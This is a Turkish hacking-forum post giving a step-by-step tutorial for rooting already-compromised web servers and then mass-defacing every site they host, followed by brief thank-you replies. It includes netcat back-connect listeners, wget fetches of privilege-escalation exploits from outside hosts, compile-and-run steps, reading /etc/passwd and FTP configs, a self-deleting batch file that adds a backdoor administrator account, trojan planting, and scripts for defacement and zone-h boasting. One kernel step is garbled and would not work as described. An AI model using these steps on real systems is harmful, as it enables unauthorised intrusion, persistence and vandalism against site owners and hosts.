Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Windows - Linux Server Shell ile Server Root Geniş Videolu Anlatım
#1
Selamün Aleyküm Cyberizmciler ben KingSkrupellos Cyberizm.Org. Bugün size server rootlamaya elimden geldiğince anlatmaya çalıştım. Konuya uygun videolarda buldum. Bu konuyu forumda
sevdiğim bir kardeşimin hatırına yaptım. Sizlerde faydalanın istedim.
(Administrar/root) en servidores Windows (C99 Shell)



Windows Back Connect



Linux Server Root



SQL injection+SHELL upload+Rooting a server



Root Server Linux 2014



Serverda Shell ile root olmak için size lazım olan hack yemek malzemeleri => netcat programı, c99 veya r57 shell, zone-h sitesi mass deface kaydı perl, mass.pl, ve bir tanede index
1. YÖNTEM => Binshell ile açık bir porta bağlan. ondan sonra /tmp dizini her zaman permissonu 777 olan alandır, hostun üst dizinlerini görüntüleye biliyorsan /tmp dizinine girerek bindshelli buraya upload et.Eğer /tmp dizinini görme yetkin yoksa bindshelli ayrı bir servera atarız wget komutuyla shell bulunan serverın dizinine çek. /tmp te bindshellin duruyor ise (server türüne göre bindshellimiz) şimdi yapacağın iş c99 shell için tools bölümüne gelip bindshell yazan yerde bindshellimizin kullanıcı adı şifre ve portunu yazarak bağlanmaktır.Daha sonra tablodan halletcin işi.
2. YÖNTEM => NetCat programı ile ( hem sende kurulu hem karşı pc'de yada serverda kurulu olması gerekiyor - yada bir başka deyişle yüklenmesi gerekiyor )Daha sonra bir tablo çıkacak ondan sonrasını yine basitleşiyor.Bir diğer husus ise şöyle anlatıyım => Başlayalım başlat çalıştıra cmd yazıp tamam diyoruz. karşımıza siyah ms-dos ekranı gelecek bu ekrana nc -v -l -p 443 yazalım (ben 443 dedim sizde hangi port açıksa artık) enterlıyalım Ufak bi not: (bazen sizin portunuz açık olabilir ama serverin o portu açık olmayabilir açık server portunu Nmap - Zenmap GUI programı bize soyluyor. bununla tarayabilirniz)shellimizde de bu yazı çıktıktan sonra dos ekranına donelim baglandıkmı bakalım.Servera bağladıysanız hangi yıl olduğu ve sürümü çıkacaktır.Mesela bu yıl 2014 sürümü 2.7 olsun mesela. C+ exploitlerin dilidir.wget komutuyla exploiti server upload edelim ornek olarakwget http://xxx.com/2.7.c Bazen ise shelli manuel upload etmek zorunda kalabilirsiniz.attıgımız exploiti derleyecegiz şimdi ( derleme işleminde yeni isim verecegiz)gcc -o root 2.6.22.c (root yazdımız yere istediginizi yazabilirsiniz)chmod ayarı yapacagızchmod 777 root dedikten sonra explotimizi çağırmaya geldi sıra./root diyerek exploitimizi çağırıyoruz ID komutuyla kontrol edin.Evet serverımız rootlandı ise bu aşamadan sonra WhoAmI komutuyla görebiliriz.şimdi musait bi yere indeximizi ve mass.pl yi atalım.serverdakileri siteleri gormek içinse çok çeşitli yollarımız mevcuttur
bu komutlar :
Kod:
/etc/vdomainaliases/
/etc/vfilters/
/var/www/vhosts/
/var/named/
/etc/passwd/
/etc/hosts/
/etc/apache/
/etc/apache2/
/etc/named.conf/
Mesela benimki böyle oldu => /var/www/vhosts/ cd /var/www/hosts/
komutunu verdikten sonra
ls (LS yani) komutuyla sıralayıp gorebiliriz yada izinler açıksa shellden o dizine gecebiliriz
siteleri bulup bilgisayarımızda C:/Perl/bin/ klasorunun içine hack.txt diyer kayıt edin.(bilgilsayarınızda perl Programı yuklu olmalıdır)
kayıt ettikten sonra dos ekranında mass deface işlemine gecelim
önce ekrana perl mas.pl yazıp nasıl çalıştıgınız kontrol ediyoruz daha sonra uygulamaya geciyoruz (orda example ı veriyor)
mass deface biraz zaman alabilir sabırlı olmak gerek
işlem bitince all homepages defaced diye bi yazı gelecek bu yazıdan sonra yine başlat çalıştır cmd ye geliyoruz
Kod:
cd..
cd..
cd perl
cd bin
perl zoneh.pl hack.txt KingSkrupellos Cyberizm.Org diye (nickimi yazdım) yazıp enter diyoruz. Siz kendinize göre yapın işte.
3. YÖNTEM => Dosya upload yapmanı engelleyen temp dizinindeki bir dosyayı etkisiz hale getirmen gerekiyor.c99 shell proc. buluo birçok dosyayı silmemiz gerekiyor ki
işimiz kolaylaşsın ve sistem çöksün herkese root yetkisi versin.
4. YÖNTEM => Server security information:
Open base dir: /home/siteismi/:/usr/lib/php:/usr/local/lib/php:/tm
gibi bir yazı bulman gerekiyor. Burada sadece sana lazım olan etc/passwd'ler bunlar ya bas, eğer basamassan webroot shell yükle onunla çek etc/passwd'leri.
şöyle yazılar çıkacak mesela
Kod:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
Gibi bilgiler verecek şimdi root dizini şu şekil
root:x:0:0:root:/root:/bin/bash olduğu için yukarıya from:0 to: 0
yazarak giriş yapıcaz gerisi sizin işinize kalıyor ..
5. YÖNTEM => Ayrıyetten birde ftp rootlama yöntemi var. Pro ftp kulanan bir hosting ise bu yolları görüntüleyerek (dikat ediniz conf ) şifreleri değiştirip root olabilirsiniz elde edeceğiniz ana< ftp sizi root yapar hosting içerisinde /home klasörü bütün sitelerin olduğu dizindir
[code]proftpd.conf - /etc/proftpd.conf.tmpeditlib
/etc/proftpd.conf.bytes
/etc/proftpd.conf.rpmnew
/etc/proftpd.conf.rpmsave
/etc/proftpd.conf-
/etc/proftpd.conf,v
/etc/proftpd.conf
/scripts/proftpd.conf.default.bsd
/scripts/proftpd.conf.default
6. YÖNTEM => Diğer kısa bir anlatım - Linux server rootlamak için =>
wget http://www.siteadi.com/exploits/exploitadi
chmod 777 exploitadi
./exploitadi
Şeklinde kullanıp serverı rootlayabilirsiniz.
7. YÖNTEM => bir win servera fso destekLi bir scriptLe girdigimiz zaman cmd iLe
uzaktan komut iLe user ekleyip ;
Kod:
net user pow3rz 123456 /add
şekLinde sonra net user localgroup administrator pow3rz /add
şekLinde admin yetkisi verip server ip aLıp uzak masaüstü iLe bağLanıp istedigimizi yaparız bu bir yöntem ;
Eğer ki user ekeleyemezseniz
Kod:
net user administrator /random
komutuyla mevcut kullanicilarin şifrelerini öğrenebilirsiniz ;
ama şöyLe düşüneLİm bir Nt servera girdik ve komut girme yetkimiz yok.
neLer yapabiLiriz şimdi uzaktan komut verip user ekLeyemiyoruz ama komut çaLıştırabiLiyoruz.
o zaman hemen size bir puf noktası veriyorum. yazdığımız bir kodu .bat formatına çevirip uzaktan user ekliyecez
hemen başlıyalım bir txt açın ;
içine
Kod:
@echo
net user pow3rz 123456 /add
yazın ve pow3rz.bat die kayıt edin çaLıştırın ve denetim masasından kullanıcı hesapLarına baktığınız zaman
pow3rz adında bir user oLuşturmuş olacak,
şimdi hemen bir txt açıyoruz içine
Kod:
@echo
net user pow3rz 123456 /add
del pow3rz.bat
yazıyoruz ve pow3rz.bat die kaydediyoruz ve çalıştırıyoruz
ve komuttan sonra pow3rz.bat siLinecegini göreceksiniz ve bu sayede fso içinde komut ekLetip
useri kLetip aynı şekiLde administrator yetkisi vererek dosyaLarı siLdirip root düzeyine erişebiLİrsiniz.
başka bir yöntem ; trojen iLe buda basit bir oLaydır arkadaşLar bir key buLnu kendi serverınızı oLuşturun.
ve win servera upload edin :] serverda dosyayı çaLıştırın ve trojan buLuşacaktır. gidin proğramın cLientini
açın ipden bağLanın ve client sayesinde proğram sayesinde pc ye bağLanın.
8. YÖNTEM => 2.6.30 dan 2.6.36-rc8 olan kernellerde
backconnect çektikten sonra şu komutla
Kod:
echo “alias net-pf-21 off” > /etc/modprobe.d/disable-rds
yazdıktan sonra root olabilirsiniz.
Not : Her server da çalışmaz.
Not 2 => Yöntemler daha fazla geliştirelebilir. Beyninizi kullanın. Yöntemleri kendinize göre farklılaştırabilirsiniz.
Anlatım bu kadar yeter. Umarım faydalı olmuştur.
Beğenenler:
#2
eline sağlık abi güzel anlatım teşekkürler
Beğenenler:
#3
eline emeğine sağlık kardeşim exciting
Beğenenler:
#4
eline emeğine sağlık kardeşim
Beğenenler:
#5
eline emeğine sağlık reis
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Windows Dos atma Mr.Blade 1 9 56 dakika önce
Son Yorum: J3adJ3oy
  Wafw00f Kurulum ve kullanımı(Linux) Mr.Blade 4 15 1 saat önce
Son Yorum: Mr.Blade
  Shell Upload Dorkları H4Sec 177 10,592 Dün, Saat: 13:16
Son Yorum: Mr.Blade
  2016 Güncel Exploit Dökümanı + Videolu Anlatım KingSkrupellos 5 278 04-12-2016, Saat: 00:31
Son Yorum: DeaTHKNighT33
  Kali Linux Eğitimi - PDF CyberHacker 1 41 03-12-2016, Saat: 16:47
Son Yorum: cemadrian
Anahtar Kelimeler

Windows - Linux Server Shell ile Server Root Geniş Videolu Anlatım indir, Windows - Linux Server Shell ile Server Root Geniş Videolu Anlatım Videosu, Windows - Linux Server Shell ile Server Root Geniş Videolu Anlatım Online izle, Windows - Linux Server Shell ile Server Root Geniş Videolu Anlatım Bedava indir, Windows - Linux Server Shell ile Server Root Geniş Videolu Anlatım Yükle, Windows - Linux Server Shell ile Server Root Geniş Videolu Anlatım Hakkında, Windows - Linux Server Shell ile Server Root Geniş Videolu Anlatım Nedir, Windows - Linux Server Shell ile Server Root Geniş Videolu Anlatım Free indir, Windows - Linux Server Shell ile Server Root Geniş Videolu Anlatım Oyunu, Windows - Linux Server Shell ile Server Root Geniş Videolu Anlatım Download


1 Ziyaretçi